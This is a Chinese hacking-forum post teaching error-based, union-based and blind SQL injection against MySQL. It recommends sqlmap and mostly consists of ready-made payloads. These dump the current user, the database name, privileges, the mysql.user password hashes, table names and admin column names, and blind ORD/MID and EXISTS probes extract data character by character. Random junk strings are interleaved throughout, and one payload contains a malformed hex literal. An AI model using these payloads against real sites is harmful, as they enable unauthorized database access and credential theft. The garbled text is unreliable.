放假第一天,本应该好好放松一下,可是还是想着把文章写完先。。。" w, l+ y, o, Y
5 T2 q6 K c; `' P4 q- t+ z
这次的主题是高级注入,坛子里也讲到了一些,不过本文旨在给大家一个更深刻的概念和全面的理解,下面看看我自己列的一个表$ \- o3 X2 N1 _ |6 g- Y0 _
$ h+ q4 g6 a3 s4 Y [# w
分类标准 分类 备注
. _' y" G% a% S7 e2 {按字段类型 整型注入,字符型注入 4 I' f" Z$ k) s+ `' c8 h
按出现的位置 get注入,post注入,cookie注入,http header注入
7 g, }, L( Q+ O( U" o' U然而高级注入是这样的3 |& n9 C5 H5 W" i# P
`) f2 p/ i) s8 Y/ G% h
高级注入分类 条件+ `% m/ Y( a% f) S3 {
error-based sql 数据库的错误回显可以返回,存在数据库,表结构# q, ^" ^, h j4 Q' }0 t4 z
union-based sql 能够使用union,存在数据库,表结构
5 F) s: E7 H) Z, [; q9 @3 W+ k1 Wblind sql 存在注入
' y# X( D. {; p6 z3 z1 D我们暂且不考虑waf等的影响,只从原理上学习。通过上面我们不难发现,三种高级注入选择的顺序应该是eub(第一个字母,后面为了方便我都这样表示了 ),实际上,e是不需要知道字段数的,u需要知道字段数,e之所以在前我觉得主要是因为这个,因为在其他方面它们没有本质的区别,它们都需要知道数据库以及表的结构,这样才能构造出相应的语句,当然,能e一般能u(没过滤union等),反过来却很不一定,因为一般会有自定义的错误提醒。如果没有结构,那么就回到了最悲剧,最麻烦的b了,猜。。。当然可能没有结果,但是如果只是不能使用u,有结构,b还是能出结果的,只是苦逼点而已。。。
2 P8 B" x6 e1 ]9 \7 A! q: O0 U& Y
1 K8 q1 N$ Q& |" p好了,说了这么多,该上神器sqlmap了,最近坛子里貌似很火- b4 L3 s" g% E, O( `* C+ g
/ d* s2 y* |6 S( a
附件分别以mysql和mssql为例子,提醒:sqlmap中使用-v 3可以查看每个请求的payload。# r6 T+ {+ c( ?4 |; l$ S {: C
% c) ` s/ n6 ~1 n2 e3 m
这里用mysql说明: T" }" p, H$ l$ j+ o; H
9 T3 i; S, A+ S x1 u
e注入坛子里很多了,请看戳我或者再戳我
/ [9 \% Z1 b- B
. A, H1 K$ P8 D4 B+ D* Yu注入其实也很多了,这里就大概帖上一些重要语句吧,附件上结合例子都有的2 [! E1 W Z) A, k; t; W! ^/ _
! A% t" N% e# ]& _0 U5 ?获取当前数据库用户名$ |- d' O1 c$ X2 i% o, C/ G
) {( W* E! g7 _/ c* W2 Y: d0 R
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(C; v8 K2 N G' R! c8 x/ U7 f( m
AST(CURRENT_USER() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NUL
2 e2 D7 R/ D' o/ v) i( kL, NULL#
. o" @! y, }$ e, @9 s注意concat那里不是必须的,只是sqlmap为了自动攫取出数据加上的特征,下面语句类似,涉及基础性的知识,基友们自己去补吧。
" K$ \ c) w( ^) X + H+ Z1 v5 a% I
获取数据库名8 D0 w* x+ R$ C, L7 n
4 x+ S7 H' I$ s8 _8 tUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#
3 q) S3 g' Q' L9 H获取所有用户名
% R2 C& z. J5 q # M$ }3 A+ m3 \$ P. v. [' D( @2 L
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#
- t3 ~; u- N' t查看当前用户权限
: v: G) N4 _' a8 x1 A5 C ) Z9 C. v# q, o# `6 o/ |
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(privilege_type AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES## Z0 s0 m% ?% L$ h8 a9 u3 H0 ~
尝试获取密码,当然需要有能读mysql数据库的权限: V4 d, w5 ~. _1 J; e+ }5 z3 B! \
: E1 U) l, f, f w: `
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(user AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(password AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM mysql.user#* ?7 w p' v U$ H/ x
获取表名,limit什么的自己搞啦8 L6 P3 t% f8 P/ F2 h3 F4 X" w! }
$ R% Q' X9 M8 Q, U3 x0 k& WUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(table_name AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema = 0x7061727474696d655f6a6f62#1 p% r3 c$ X9 U" M6 E) E
获取字段名及其类型
' }2 ]6 L- p# B% ^5 }, QUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(column_name AS CHAR),0×20),0x697461626a6e,IFNULL(CAST(column_type AS CHAR),0×20),0x3a6864623a),NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x61646d696e5f7461626c65 AND table_schema=0x7061727474696d655f6a6f62 AND (column_name=0x61646d696e6e616d65 OR column_name=0x70617373776f7264)#0 I" D. e' z: v# H% d& o
! e2 }0 e! a- i
b注入,呵呵,除了当前用户,数据库,版本可以出来,而如果不能u,但存在数据的结构表,还是能苦逼出来,否则猜也不一定能猜到表和字段,内容自然也出不来,苦逼access啊。。。
( K) U) k) e+ A! k/ L* t
; N; B8 P; x' J0 ?7 x) E0 H9 a如:
8 n F6 o9 T9 b获取当前用户名
$ A( ~2 n7 H: A# b' ]1 s$ d
* N1 `- k3 ^, k* w! a ^AND ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,1)) > 1161 V p' V" _: S3 r' V2 ~
获取当前数据库2 V. x- C c( f+ Y/ C1 h
9 ^; l% \3 H% l& C
AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1)) > 106
$ @& C$ u! }3 J8 y9 ]获取表名
/ L+ B1 } W( p. C4 g# F. t
, W/ q9 J$ f9 f' P3 w! WAND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7061727474696d655f6a6f62),1,1)) > 51
" S- ^( k9 a$ T% G获取字段名及其类型和爆内容就不说了,改改上面的就可以了。: C. F5 c8 n8 Y7 J6 E) O
回到最苦逼的情况,无结构的,mysql版本<5.0,现在不多见了吧,还是看看语句。
0 B* c8 s6 D. R- J爆表8 }+ W0 m8 {, g9 v1 y2 Y6 t
5 t8 t& l2 s, IAND EXISTS(select * from table)/ l% S; T* l7 o; D$ [4 ^9 z
爆字段! g8 Q6 ~8 b7 }) q$ q
+ Z+ i- C4 T% ]" w$ M' M9 K
AND EXISTS(select pwd from table)* ]6 ?4 n4 r/ r
盲注的变化就比较多了,由于篇幅,只是举个例子而已。
' |* w, L1 u5 V8 X2 ~6 }
) d4 P3 L# I5 Y" [ e+ q本来想把mssql和access都写上的,不过编辑得太累了,有时间再写吧,其实原理都差不多,今天就洗洗睡了吧。" d6 x' ^( G9 k% {9 W- O0 m
|
发表于 2013-7-16 20:31:26
收藏
支持
反对